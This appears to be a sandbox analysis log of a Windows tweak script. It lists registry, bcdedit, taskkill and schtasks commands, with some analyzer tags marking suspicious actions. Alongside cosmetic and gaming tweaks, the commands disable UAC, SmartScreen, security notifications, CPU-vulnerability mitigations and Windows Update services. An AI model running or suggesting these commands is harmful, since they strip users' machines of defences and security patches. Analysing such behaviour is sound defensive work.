C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold2" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold2" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSensitivity" /t REG_DWORD /d "6" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSensitivity" /t REG_DWORD /d "6" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableInstallerDetection" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableInstallerDetection" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableSecureUIAPaths" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableSecureUIAPaths" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverride" /t REG_DWORD /d "3" /f
    C:\Windows\system32\reg.exe   reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverride" /t REG_DWORD /d "3" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverrideMask" /t REG_DWORD /d "3" /f
    C:\Windows\system32\reg.exe   reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverrideMask" /t REG_DWORD /d "3" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettings" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettings" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" /v "DisableTsx" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" /v "DisableTsx" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_TOASTS_ENABLED" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_TOASTS_ENABLED" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoTileApplicationNotification" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoTileApplicationNotification" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsStore" /v "AutoDownload" /t REG_DWORD /d "2" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsStore" /v "AutoDownload" /t REG_DWORD /d "2" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "EnableTransparency" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "EnableTransparency" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg Add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /d 0 /f
    C:\Windows\system32\reg.exe   Reg Add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /d 0 /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg Add "HKCU\Control Panel\Desktop" /v "DragFullWindows" /d 1 /f
    C:\Windows\system32\reg.exe   Reg Add "HKCU\Control Panel\Desktop" /v "DragFullWindows" /d 1 /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "FontSmoothing" /t REG_SZ /d "2" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "FontSmoothing" /t REG_SZ /d "2" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WSearch" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WSearch" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_DWORD /d "506" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_DWORD /d "506" /f
C:\Windows\system32\cmd.exe   "C:\Windows\system32\cmd.exe" /c bcdedit /set disabledynamictick yes
    C:\Windows\system32\bcdedit.exe   bcdedit /set disabledynamictick yes
        - Modifies boot configuration data using bcdedit
C:\Windows\system32\cmd.exe   "C:\Windows\system32\cmd.exe" /c bcdedit /set useplatformtick yes
    C:\Windows\system32\bcdedit.exe   bcdedit /set useplatformtick yes
        - Modifies boot configuration data using bcdedit
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "GamePanelStartupTipIndex" /t REG_DWORD /d "3" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "GamePanelStartupTipIndex" /t REG_DWORD /d "3" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "ShowStartupPanel" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "ShowStartupPanel" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\GameDVR" /v "AppCaptureEnabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\GameDVR" /v "AppCaptureEnabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_AutoGameModeDefaultProfile" /f
    C:\Windows\system32\reg.exe   Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_AutoGameModeDefaultProfile" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_GameModeRelatedProcesses" /f
    C:\Windows\system32\reg.exe   Reg.exe delete "HKCU\System\GameConfigStore" /v "Win32_GameModeRelatedProcesses" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DSEBehavior" /t REG_DWORD /d "2" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DSEBehavior" /t REG_DWORD /d "2" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehavior" /t REG_DWORD /d "2" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehavior" /t REG_DWORD /d "2" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\ApplicationManagement\AllowGameDVR" /v "value" /t REG_DWORD /d "0" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\ApplicationManagement\AllowGameDVR" /v "value" /t REG_DWORD /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Children" /f
    C:\Windows\system32\reg.exe   Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Children" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Parents" /f
    C:\Windows\system32\reg.exe   Reg.exe delete "HKCU\SYSTEM\GameConfigStore\Parents" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c taskkill /F /FI "IMAGENAME eq SystemSettings.exe"
    C:\Windows\system32\taskkill.exe   taskkill /F /FI "IMAGENAME eq SystemSettings.exe"
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c net stop wuauserv & net stop UsoSvc
    C:\Windows\system32\net.exe   net stop wuauserv
        C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop wuauserv
    C:\Windows\system32\net.exe   net stop UsoSvc
        C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop UsoSvc
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f
        - Modifies security service
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f
